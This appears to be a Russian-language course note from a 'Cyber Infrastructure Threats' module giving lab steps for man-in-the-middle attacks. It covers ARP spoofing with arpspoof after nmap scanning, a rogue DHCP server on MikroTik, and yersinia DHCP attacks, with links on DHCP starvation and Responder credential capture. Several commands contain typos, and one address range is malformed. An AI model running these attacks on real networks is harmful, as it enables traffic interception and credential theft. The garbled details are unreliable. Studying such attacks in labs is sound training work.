# MITM (ARP Spoofing / DHCP Rogue Server)
#### 1. ARP Spoofing
> nano/etc/sysctl.conf
> net.ipv4.ip_forward=1
> sysctl -p
Отсканировать сеть и ОС найденной машины
> arp-scan -I eth0 -I eth0 192.168.1.0/24
> nmap 192.168.xxx.xxx
> nmap 192.168.xxx.xxx -O
> arpspof -i eth0 -r 192.168.xxx.xxx -t 192.168.xxx.xxx
>
> -i - интерфейс
> -r - IP машины на которую нацелена атака
> -t - шлюз
[Руководство по arpspoof](https://kali.tools/?p=220)
[Фильтры Wireshark](https://networkguru.ru/wireshark-filtr-po-ip-portu-protokolu-mac/)
[Фильтры Wireshark](https://hackware.ru/?p=7008)
#### 2. DHCP Rogue Server
Настройки mikrotik
> system identity set name=DHCP
> export
> ip dhcp-client remove numbers=0
> ip address add interface=ether1 address=192.168.1.251/24
>
> Чтобы удалить IP адреса
> ip address print
> ip address remove numbers=0
Настройки DHCP
> Установить WinBox и включить legacy mod
> Ввести адрес 192.168.1.251, Login - admin -> Connect
> И так же на fake-DHCP
>
> Далее, отключить DHCP на файрволе -> services > DHCP server -> Enable DHCP server on LAN interface
>
> В WinBox настроить пул -> IP -> Pool, Name - DHCP-Pool, Addresses - 192.168.1.10-1992.168.1.50
>
> В WinBox настроить DHCP Server и включить
> `Address - 192.168.1.0/24, Gateway - 192.168.1.1, Netmask - 24, DNS - 8.8.8.8`
> Перезапустить сеть на машине, после этого во вкладке Leases должен появиться клиент
Настройка fake-DHCP
> В WinBox настроить пул -> IP -> Pool, Name - DHCP-Pool, Addresses - 192.168.2.10-1992.168.2.50
>
> В WinBox настроить DHCP Server и включить
> `Address - 192.168.2.0/24, Gateway - 192.168.2.254, Netmask - 24, DNS - 8.8.8.8`
Настройка Kali
> Прописать статику
>
> Прописать nameserver 8.8.8.8 в resolf.conf
>
> Установить yersinia - apt install yersinia
>
> Для скана - `nmap -n --script=broadcast-dhcp-discover`
>
> Узнать MAC DHCP - `arp -a`
> Запустить yersinia в граф.интерфейсе - `yersinia -G`
>
> Вписать destination MAC -> Вкладка DHCP -> Edit mode (после записи MAC, отключить Edit mode)
>
> Тест атаки -> Launch attack -> DHCP -> sending DISCOVER packet -> OK
>
> На сервере с DHCP должны появиться результаты
[Атаки на сетевое оборудование с Kali Linux](https://habr.com/ru/post/326968/)
[Описание Responder](https://kali.tools/?p=1679)
[LLMNR & NBT-NS Poisoning and Credential Access using Responder](https://www.cynet.com/attack-techniques-hands-on/llmnr-nbt-ns-poisoning-and-credential-access-using-responder/)
[YERSINIA. СОЗДАНИЕ ПОДДЕЛЬНОГО DHCP (ROGUE DHCP) СЕРВЕРА](https://blackdiver.net/it/linux/4029)
[DOS АТАКА НА DHCP СЕРВЕР. DHCP STARVATION](https://blackdiver.net/it/linux/4031)
[YERSINIA. DHCP RELEASE – КАК ЗАСТАВИТЬ КЛИЕНТОВ ПЕРЕПОЛУЧИТЬ DHCP АДРЕСА](https://blackdiver.net/it/linux/4082)
###### tags: `Cyber Infrastructure Threats`, `1 модуль`